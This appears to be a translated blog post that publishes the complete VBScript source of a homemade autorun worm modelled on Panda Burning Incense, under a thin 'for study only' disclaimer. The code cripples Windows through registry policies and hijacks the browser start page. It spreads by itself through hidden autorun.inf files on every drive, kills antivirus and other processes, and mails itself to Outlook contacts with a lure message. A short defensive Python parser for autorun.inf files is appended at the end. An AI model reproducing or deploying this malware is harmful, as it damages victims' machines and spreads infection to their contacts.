Nyboy.vbs virus source code released: my simulation of Panda Burning Incense

Source: Internet
Author: User
Anyone who uses USB flash drives has met the autorun virus. When the virus body is triggered by a double-click, it copies itself to the C, D and E drives and to the system32 folder on the system disk (generating an EXE file and an Autorun.inf file) and modifies the registry. After that, right-clicking the C drive shows an "Auto" command (in bold) or two start commands. I have studied VBS for only 15 days, and I set out to simulate the autorun virus and some of the Panda Burning Incense functions. My ability is limited, so I can only simulate this kind of virus. Statement: I simulated this virus purely for learning and technical study, and it should not be used to do damage. If someone uses my code for destruction, they bear the consequences themselves.

On Error Resume Next
Dim Fso,wsh,myfile,ws,pp,fsofolder
Set Wsh=wscript.createobject ("Wscript.Shell")
Set Fso=wscript.createobject ("Scripting.FileSystemObject")
Set MYFILE=FSO. GetFile (Wscript.scriptfullname)
' Modify the registry (Start menu contents and IE settings)
Wsh. RegWrite "Hklm\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall\checkedvalue", 0, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\restrictions\nobrowsercontextmenu", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\restrictions\nobrowsersaveas", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\restrictions\nofileopen", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\advanced", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\cache Internet", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\autoconfig", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\homepage", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\history", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\connwiz Admin Lock", 1, "REG_DWORD"
Wsh. RegWrite "HKCU\Software\Microsoft\Internet explorer\main\start Page", "http://ruanji03.ys168.com"
Wsh. RegWrite "HKCU\Software\Microsoft\Internet explorer\main\search Page", "http://ruanji03.ys168.com"
Wsh. RegWrite "HKCU\Software\Microsoft\Internet Explorer\main\default_page_url", "http://ruanji03.ys168.com"
Wsh. RegWrite "HKCU\Software\Microsoft\Internet Explorer\main\default_search_url", "http://ruanji03.ys168.com"
Wsh. RegWrite "Hkey_users\. Default\software\microsoft\internet explorer\main\start Page "," http://ruanji03.ys168.com "
Wsh. RegWrite "Hkey_users\. Default\software\microsoft\internet Explorer\main\default_page_url "," http://ruanji03.ys168.com "
Wsh. RegWrite "Hkey_users\. Default\software\microsoft\internet Explorer\main\default_search_url "," http://ruanji03.ys168.com "
Wsh. RegWrite "Hkey_users\. Default\software\microsoft\internet explorer\main\search Page "," http://ruanji03.ys168.com "
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\homepage", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\securitytab", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\Control panel\resetwebsettings", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet Explorer\restrictions\noviewsource", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubscriptions", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nofilemenu", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode", 1, "REG_DWORD"
Wsh. RegWrite "Hklm\software\microsoft\windows\currentversion\run\win32system", "C:\NYboy.vbs"
Wsh. RegWrite "Hklm\software\microsoft\windows\currentversion\run\scanregistry", "" "
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\norun", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\notraycontextmenu", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\noclose", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\startmenulogoff", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nosmhelp", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nonethood", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nowinkeys", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\norecentdocsmenu", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nofind", "1", "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nowindowsupdate", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\nofavoritesmenu", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\explorer\norecentdocshistory", 1, "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools", "1", "REG_DWORD"
Wsh. RegWrite "Hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled", 1, "REG_DWORD"
' The user cannot open the hard drive by double-clicking it, which can also be modified to make it unable to open the folder by double-clicking the same, not redundant
Wsh. RegWrite "hklm\software\classes\drive\shell\auto\command\", "C:\NYboy.bat '%1 '"
Wsh. RegWrite "hkcr\drive\shell\", "Auto"
Wsh. RegWrite "hkcr\drive\shell\auto\command\", "C:\NYboy.bat '%1 '"
Wsh. RegWrite "hklm\software\classes\directory\shell\", "Auto"
Wsh. RegWrite "hkcr\directory\shell\auto\command\", "C:\NYboy.bat '%1 '"
Wsh. RegWrite "hklm\software\classes\directory\shell\auto\command\", "C:\NYboy.bat '%1 '"
' Modify default file icon Here you can change to a cute panda!
Wsh. RegWrite "hkcr\exefile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hkcr\txtfile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hkcr\dllfile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hkcr\batfile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hkcr\inifile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hklm\software\classes\exefile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hklm\software\classes\txtfile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hklm\software\classes\dllfile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hklm\software\classes\batfile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hklm\software\classes\inifile\defaulticon\", "C:\1.ico"
Wsh. RegWrite "hklm\software\classes\.reg\", "txtfile"
Wsh. RegWrite "Hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "Hello, soldier and you have a little joke"
Wsh. RegWrite "Hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext", "You have been poisoned, quickly antivirus or contact with QQ252287438 "
' Copy yourself to C,d,e,f,u disk
Myfile.copy "C:\"
Myfile.copy "D:\"
Myfile.copy "E:\"
Myfile.copy "F:\"
Myfile.copy "I:\"
Myfile.attributes=34
' Define the contents of the Autorun.inf this is the part of the code you must have. Here's a simple way to write
If FSO. FileExists ("C:\autorun.inf") Then
Set objfolder = fso. GetFile ("C:\autorun.inf")
Else
Wsh.run "cmd/c Echo [Autorun]>>c:\autorun.inf" _
& "&& Echo Open=nyboy.bat >>c:\autorun.inf" _
& "&& Echo Shellexecute=nyboy.bat >>c:\autorun.inf" _
& "&& Echo Shell\auto\command=nyboy.bat>>c:\autorun.inf" _
& "&& Echo Shell=auto>>c:\autorun.inf" _
& "&& attrib +h +s +r C:\autorun.inf"
Set Autobatc=fso.createtextfile ("C:\NYboy.bat", 1,ture)
Autobatc.writeline ("Nyboy.vbs")
End If
If FSO. FileExists ("D:\autorun.inf") Then
Set objfolder = fso. GetFile ("D:\autorun.inf")
Else
Wsh.run "cmd/c Echo [Autorun]>>d:\autorun.inf" _
& "&& Echo Open=nyboy.bat >>d:\autorun.inf" _
& "&& Echo Shellexecute=nyboy.bat >>d:\autorun.inf" _
& "&& Echo Shell\auto\command=nyboy.bat>>d:\autorun.inf" _
& "&& Echo Shell=auto>>d:\autorun.inf" _
& "&& attrib +h +s +r D:\autorun.inf"
Set Autobatd=fso.createtextfile ("D:\NYboy.bat", 1,ture)
Autobatd.writeline ("Nyboy.vbs")
End If
If FSO. FileExists ("E:\autorun.inf") Then
Set objfolder = fso. GetFile ("E:\autorun.inf")
Else
Wsh.run "cmd/c Echo [Autorun]>>e:\autorun.inf" _
& "&& Echo Open=nyboy.bat >>e:\autorun.inf" _
& "&& Echo Shellexecute=nyboy.bat >>e:\autorun.inf" _
& "&& Echo Shell\auto\command=nyboy.bat>>e:\autorun.inf" _
& "&& Echo Shell=auto>>e:\autorun.inf" _
& "&& attrib +h +s +r E:\autorun.inf"
Set Autobate=fso.createtextfile ("E:\NYboy.bat", 1,ture)
Autobate.writeline ("Nyboy.vbs")
End If
If FSO. FileExists ("F:\autorun.inf") Then
Set objfolder = fso. GetFile ("F:\autorun.inf")
Else
Wsh.run "cmd/c Echo [Autorun]>>f:\autorun.inf" _
& "&& Echo Open=nyboy.bat >>f:\autorun.inf" _
& "&& Echo Shellexecute=nyboy.bat >>f:\autorun.inf" _
& "&& Echo Shell\auto\command=nyboy.bat>>f:\autorun.inf" _
& "&& Echo Shell=auto>>f:\autorun.inf" _
& "&& attrib +h +s +r F:\autorun.inf"
Set Autobatf=fso.createtextfile ("F:\NYboy.bat", 1,ture)
Autobatf.writeline ("Nyboy.vbs")
End If
If FSO. FileExists ("I:\autorun.inf") Then
Set objfolder = fso. GetFile ("I:\autorun.inf")
Else
Wsh.run "cmd/c Echo [Autorun]>>i:\autorun.inf" _
& "&& Echo Open=nyboy.bat >>i:\autorun.inf" _
& "&& Echo Shellexecute=nyboy.bat >>i:\autorun.inf" _
& "&& Echo Shell\auto\command=nyboy.bat>>i:\autorun.inf" _
& "&& Echo Shell=auto>>i:\autorun.inf" _
& "&& attrib +h +s +r I:\autorun.inf"
Set Autobatf=fso.createtextfile ("I:\NYboy.bat", 1,ture)
Autobatf.writeline ("Nyboy.vbs")
End If
' Set virus body properties for system read-only Hide
Wsh.run "cmd/c attrib +h +s +r" _
& "&& attrib +h +s +r D:\NYboy.bat" _
& "&& attrib +h +s +r E:\NYboy.bat" _
& "&& attrib +h +s +r F:\NYboy.bat" _
& "&& attrib +h +s +r I:\NYboy.bat"
"Forced to end certain processes, such as QQ, Notepad, Web pages, batch files, Kabbah, Realplay and other processes, run after the file does not open
Todo
Set Ws=getobject ("Winmgmts:\\.\root\cimv2")
Set Pp=ws.execquery ("SELECT * from Win32_Process where name= ' taskmgr.exe ' or name = ' QQ.exe ' or name = ' notepad.exe ' or name ') = ' IEXPLORE.exe ' or name = ' cmd.exe ' or name = ' Avp.exe ' or name = ' WinRAR.exe ' or name = ' Realplay.exe ' or name = ' WINWORD.exe '")
For all I in pp
I.terminate ()
Wscript.Sleep 100
Next
Loop
' Enables viruses to be transmitted by mail
Set ol=createobject ("Outlook.Application")
On Error Resume Next
For X=1 to 5
Set Mail=ol. CreateItem (0)
Mail.to=ol. GetNamespace ("MAPI"). AddressLists (1). AddressEntries (x)
Mail.subject= "Are you coming tonight?" "
mail.body= "friend Hello: your friend sent you a warm invitation."              Please read the attached letter, wish you good luck! QQ Dating Channel "
MAIL.ATTACHMENTS.ADD ("C:\NYboy.vbs")
Mail.send
Next
Ol. Quit
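
A defender-side counterpart to the Autorun.inf part of the listing above, as an added example that is not part of the original post: a Python triage function that parses an autorun.inf and reports the entries that make Explorer launch a program. The sample content is constructed from the Echo lines in the listing; the function names are this example's own.

```python
import re

# [autorun] keys that cause a program to be launched from the volume.
_LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$")


def parse_autorun(text):
    """Return {lowercased key: value} for the [autorun] section only."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def triage(text):
    """List (kind, key, value) findings for one autorun.inf."""
    entries = parse_autorun(text)
    findings = [("launch", k, v) for k, v in entries.items()
                if _LAUNCH_KEY.match(k)]
    # "shell=<verb>" makes that verb the default double-click action,
    # so a matching shell\<verb>\command runs when the drive is opened.
    verb = entries.get("shell")
    if verb and "shell\\" + verb.lower() + "\\command" in entries:
        findings.append(("default-verb-hijack", "shell", verb))
    return findings


# Constructed sample: the file the listing's Echo commands would write.
SAMPLE = "\r\n".join([
    "[Autorun]",
    "Open=nyboy.bat ",
    "Shellexecute=nyboy.bat ",
    "Shell\\auto\\command=nyboy.bat",
    "Shell=auto",
])
# Constructed benign sample: label and icon only, nothing is launched.
BENIGN = "[autorun]\nlabel=Backup\nicon=drive.ico\n"

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Run it over autorun.inf files collected from drive roots during triage; each finding names the file on the volume that should be examined next.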
